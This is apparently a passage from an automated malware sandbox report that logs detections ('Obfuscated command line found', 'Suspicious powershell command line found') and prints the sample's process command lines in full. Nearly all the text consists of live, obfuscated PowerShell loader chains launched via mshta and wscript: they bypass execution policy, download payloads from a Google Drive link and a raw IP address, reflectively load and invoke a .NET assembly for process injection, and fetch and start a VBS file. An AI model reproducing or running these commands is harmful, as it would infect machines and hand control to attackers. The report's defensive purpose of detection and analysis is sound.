FREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDd
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'nu
        Obfuscated command line found
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"Jump to behavior
        PowerShell case anomaly found
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"Jump to behavior
        Suspicious powershell command line found
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = 